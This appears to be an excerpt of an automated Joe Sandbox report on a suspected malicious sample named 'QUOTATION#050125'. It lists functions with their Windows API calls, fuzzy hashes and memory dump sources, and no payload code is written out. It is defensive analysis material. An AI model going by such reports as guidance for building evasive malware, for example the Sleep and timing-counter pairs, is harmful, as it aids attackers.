Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 4f76c40e226c0d438e45dc314072450d7a0d11e47e455b8d4b8582ebc90c8385
Instruction ID: 848d94c8970dc1b15af80484c7c0ad728b3096b2c0146e1f3935a4c2c5275e5c
Opcode Fuzzy Hash: 4f76c40e226c0d438e45dc314072450d7a0d11e47e455b8d4b8582ebc90c8385
Instruction Fuzzy Hash: 4C1100B1249354AFE7208F15ED08F927FFCEB00B21F10806AEA16DA191D7B4E908DB65

Function 004EB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004EACD3,?,00008000), ref: 004EB0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004EACD3,?,00008000), ref: 004EB0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004EACD3,?,00008000), ref: 004EB0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004EACD3,?,00008000), ref: 004EB126

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 1ce5ff47339fca742cb590026427a9410894262cf5ef57cb74d7c81977078ba4
Instruction ID: fedbcf376d95405d5d1dfd85ffd294ad951f837327011643a9a044b572f6b75f
Opcode Fuzzy Hash: 1ce5ff47339fca742cb590026427a9410894262cf5ef57cb74d7c81977078ba4
Instruction Fuzzy Hash: F7117C30C40658E7CF00AFE6E9986EFBF78FF59362F004086D941B2241CB345550DB99

Function 00517E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00517E33
ScreenToClient.USER32(?,?), ref: 00517E4B
ScreenToClient.USER32(?,?), ref: 00517E6F
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00517E8A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 62e21c88725693665a64199b0cb8150e3db4a0a372035f52c8730d0b797c83a2
Instruction ID: 046f16a0067e959c62618cb699ca86c389d8ff2fc9a6960d418be164a79375ef
Opcode Fuzzy Hash: 62e21c88725693665a64199b0cb8150e3db4a0a372035f52c8730d0b797c83a2
Instruction Fuzzy Hash: 6B1143B9D0020AAFDB41CFA8C8849EEBFF9FB18310F509156E915E2210D775AA54DF90

Function 004A01F8 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0055070C,?,?,00498747,00552514), ref: 004A0202
LeaveCriticalSection.KERNEL32(0055070C,?,00498747,00552514), ref: 004A0235
SetEvent.KERNEL32(00000000,00552514), ref: 004A02C3
ResetEvent.KERNEL32 ref: 004A02CF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: 936f8b285be5c013b03117fe0cf446daa33d497f8d0c567e1eb9491b9af323e4
Instruction ID: 5669c3557057134163a8202aff845dea2e3418e2c94b8aee6ba76a6a0d2424b8
Opcode Fuzzy Hash: 936f8b285be5c013b03117fe0cf446daa33d497f8d0c567e1eb9491b9af323e4
Instruction Fuzzy Hash: 7F017839651220DBCB449F98FD689993FE4FBAA342701506AE90687361DB316C08EF94

Function 004E2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004E2DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 004E2DD6
GetCurrentThreadId.KERNEL32 ref: 004E2DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004E2DE4

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 44e9a7be5e1bced5f59c8daed80d1dbb0ad17185b78a0e599fa9b36f0817e913
Instruction ID: 6b88b6b01ffac9ee60db446eaaf2655d20ed3004912c0e962bae96e8247118fb
Opcode Fuzzy Hash: 44e9a7be5e1bced5f59c8daed80d1dbb0ad17185b78a0e599fa9b36f0817e913
Instruction Fuzzy Hash: 08E092715812247BD7202B779C0DFEB3E6CEF62BA2F004116F205D1080DAE6C845D6B1

Function 00518863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00499639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00499693
Part of subcall function 00499639: SelectObject.GDI32(?,00000000), ref: 004996A2
Part of subcall function 00499639: BeginPath.GDI32(?), ref: 004996B9
Part of subcall function 00499639: SelectObject.GDI32(?,00000000), ref: 004996E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00518887
LineTo.GDI32(?,?,?), ref: 00518894
EndPath.GDI32(?), ref: 005188A4
StrokePath.GDI32(?), ref: 005188B2

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 4f602cb798aac7a579438e0715e9fe0f7a9f439b83303bebf9d6cf1efc02c666
Instruction ID: 67df26df7b76dfe7efe4b615f2b08d782bf0bbd8b2ef8cf89c082044d4013275
Opcode Fuzzy Hash: 4f602cb798aac7a579438e0715e9fe0f7a9f439b83303bebf9d6cf1efc02c666
Instruction Fuzzy Hash: 02F05E36081658FAEB125F94AC0EFDE3F69AF2A311F048040FA11650E1C7765955EFE9

Function 004A0A9D Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004A0AAF
GetCurrentThreadId.KERNEL32 ref: 004A0ABE
GetCurrentProcessId.KERNEL32 ref: 004A0AC7
QueryPerformanceCounter.KERNEL32(?), ref: 004A0AD4

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: a64f54e583d835611ebd996553ee2d7d04dd5f98052ebc0672f22f7c3c9d7ca9
Instruction ID: 9b2707f6cd03164af0c9219a81b7aced6a27a2c6f7f757514388cf346440f5ed
Opcode Fuzzy Hash: a64f54e583d835611ebd996553ee2d7d04dd5f98052ebc0672f22f7c3c9d7ca9
Instruction Fuzzy Hash: A1F05F75D50209EBCB00DBB4D989ADEBBF8FF18205F518896E412E7150D774AB08EF51

Function 004998B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 004998CC
SetTextColor.GDI32(?,?), ref: 004998D6
SetBkMode.GDI32(?,00000001), ref: 004998E9
GetStockObject.GDI32(00000005), ref: 004998F1

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: d337584b5608460a0f10075901081d80c6144cb14868d583c0942a7ba9203464
Instruction ID: 2eea66c3e847db1bb9060a9fac73244452e96638763a5fd78d7eef46d86df503
Opcode Fuzzy Hash: d337584b5608460a0f10075901081d80c6144cb14868d583c0942a7ba9203464
Instruction Fuzzy Hash: 6CE065312C4240BADB215B74BC19BD93F11AB21335F14C21BF6F6541E1C3764644EB11

Function 004E162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 004E1634
OpenThreadToken.ADVAPI32(00000000,?,?,?,004E11D9), ref: 004E163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004E11D9), ref: 004E1648
OpenProcessToken.ADVAPI32(00000000,?,?,?,004E11D9), ref: 004E164F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 755eb2bda7ada20f7896e8719701c73439e575f3799ae5dd50a231a3b2f9e559
Instruction ID: c8936169fbf4e744ed462d64dd48ec1c6dbad224ef313a9b84de44f3d2034c1f
Opcode Fuzzy Hash: 755eb2bda7ada20f7896e8719701c73439e575f3799ae5dd50a231a3b2f9e559
Instruction Fuzzy Hash: C5E04F35A812119BD7201BB19D0DBCB3F78AF64792F148809F246C9090D6394548D754

Function 004DD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 004DD858
GetDC.USER32(00000000), ref: 004DD862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 004DD882
ReleaseDC.USER32(?), ref: 004DD8A3

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: fb7689f697ed210f62198838c840d34b4dd2feaa92850366434e03615c3ef0ed
Instruction ID: 77d5c58b93ba71c4c87ef48ff7624b5d70190f6c0c0bdab2ae759db6b78b66e4
Opcode Fuzzy Hash: fb7689f697ed210f62198838c840d34b4dd2feaa92850366434e03615c3ef0ed
Instruction Fuzzy Hash: 6AE0E5B4C40204EFCB41AFA59808AADBFB1AB18310B10941AE90AA7250C7394946AF55

Function 004DD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 004DD86C
GetDC.USER32(00000000), ref: 004DD876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 004DD882
ReleaseDC.USER32(?), ref: 004DD8A3

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: f633a25518440af2c8315fb4b0b19f9b2b5311204f4f1c3acfee1d3e7e67a15d
Instruction ID: 78acc54dc76e296274a26e641b76bb7c64d0eeef16c3ae2a23f369e11cb161d1
Opcode Fuzzy Hash: f633a25518440af2c8315fb4b0b19f9b2b5311204f4f1c3acfee1d3e7e67a15d
Instruction Fuzzy Hash: 92E01A74C40200DFCF40AFA4D80CAADBFB1BB18314B109409E90AE7250C7395905AF50

Function 004F910C Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(00000058), ref: 004F94E5
GetSaveFileNameW.COMDLG32(00000058), ref: 004F9585

Strings

X, xrefs: 004F9412

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: FileName$OpenSave
String ID: X
API String ID: 3924019920-3081909835
Opcode ID: d24cb37698d8b0b4228c0c371543858df33fb98c6b3a11c1eac137525db51d7f
Instruction ID: 820d6e89c8b7fe6479b6e1a9f82e578a895624dd5add55713b2f38550c5943f7
Opcode Fuzzy Hash: d24cb37698d8b0b4228c0c371543858df33fb98c6b3a11c1eac137525db51d7f
Instruction Fuzzy Hash: 15E1B0715083009FD714EF25C481B6EB7E4BF85318F04896EE9899B3A2DB39DD05CB9A

Function 004F4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 004F4ED4

Strings

*, xrefs: 004F4E10
LPT, xrefs: 004F4DFB

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Connection
String ID: *$LPT
API String ID: 1722446006-3443410124
Opcode ID: a6a725e6d3a78e0bfe850843db74690baa445cc7639562840f0b062b5b01d1ec
Instruction ID: 65fab6c9dff4059ea056e432f61382101ffa8827c9d6d2aef8ff6a38243f60e4
Opcode Fuzzy Hash: a6a725e6d3a78e0bfe850843db74690baa445cc7639562840f0b062b5b01d1ec
Instruction Fuzzy Hash: 51916175A002089FCB14DF54C484EABBBF1BF85318F14809AE5099F762DB39ED85CBA5

Function 00507771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(004D569E,00000000,?,0051CC08,00000000,?,00000000,00000000), ref: 0050783B
CharUpperBuffW.USER32(004D569E,00000000,?,0051CC08,?,00000000,00000000), ref: 005078DD

Strings

<sT, xrefs: 005077C8

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: BuffCharUpper
String ID: <sT
API String ID: 3964851224-3122952766
Opcode ID: 62b80fa18cbd76551326aa979e01ad2b97d8f1aa237625097079e5719a0817f9
Instruction ID: 5641f1b1f283402f81bf29230c7ad4646150b7171ff59769491b6ec2a8baafb4
Opcode Fuzzy Hash: 62b80fa18cbd76551326aa979e01ad2b97d8f1aa237625097079e5719a0817f9
Instruction Fuzzy Hash: B4615072914119EACF04FBA5CC91DFDBB78BF18708F44492AE542A3091EB386A05DBA4

Function 004B5AA9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

JOH, xrefs: 004B5BA8, 004B5C6C

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID: JOH
API String ID: 0-2376747884
Opcode ID: c36668d5a8b915149f3579077a5e50e89dfa270f59f415c341ed6787f8f2e032
Instruction ID: ccd7811adfee80cdf24ae90ecc16bd5327f1c2785a9ec9098ca6032d6e1866f4
Opcode Fuzzy Hash: c36668d5a8b915149f3579077a5e50e89dfa270f59f415c341ed6787f8f2e032
Instruction Fuzzy Hash: 7051E071D006099BCB21AFA9C845FEFFFB9AF19314F14005BF404A7292D73999029B7A

Function 0049E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0049E1B1

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 11b9cd6b1a7e1777ae5f7d5763c25dd843bd07ceab94290667b50e9d2770f44c
Instruction ID: f45ee22ba2c122f1fa65782feedb065ecbd228ccda63e62cb9a9f020ae693405
Opcode Fuzzy Hash: 11b9cd6b1a7e1777ae5f7d5763c25dd843bd07ceab94290667b50e9d2770f44c
Instruction Fuzzy Hash: 4F510035900246DFDF15EF2AC4916BA7BA4EF65310F2440ABE8919F390D6389D43CBA9

Function 0049F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0049F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0049F2BB

Strings

@, xrefs: 0049F2AF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 75d29c64fb7d4ca919ce25b6e0e0221266a70c0496f159d722faa5c2ce5f93d2
Instruction ID: 69438f1f82402798686b67b4725062e23b4f7d065428949974844eefff30d691
Opcode Fuzzy Hash: 75d29c64fb7d4ca919ce25b6e0e0221266a70c0496f159d722faa5c2ce5f93d2
Instruction Fuzzy Hash: 575169714087449BD320AF11E886BAFBBF8FF95308F91884DF2D941195EB348569CB6A

Function 004A3F4A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?), ref: 004A3F6E

Strings

RCC, xrefs: 004A3F88
MOC, xrefs: 004A3F80

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: dae7d99081589e4a0fbe48ca2be31307fb4849061fcea305bcb1c691e0d115f1
Instruction ID: 1cbb33bad6723abb1e506a957ffbab5f8afdc43ad1fa5065804635a85c55791d
Opcode Fuzzy Hash: dae7d99081589e4a0fbe48ca2be31307fb4849061fcea305bcb1c691e0d115f1
Instruction Fuzzy Hash: 1731EC7180020AAFCF11CF44C980AAEB774FF6A304F19819AF91467252E37CEE50DB69

Function 0051356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00513621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0051365C

Strings

static, xrefs: 005135BC

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 20358a191e2fec1871bda0a27f42b6a2e1a0029f848012cfa34f3c4e5c58d825
Instruction ID: 9ab06be6ec382c71760dcca32098a71c744f2db11e11cb3e365daf6933a0f059
Opcode Fuzzy Hash: 20358a191e2fec1871bda0a27f42b6a2e1a0029f848012cfa34f3c4e5c58d825
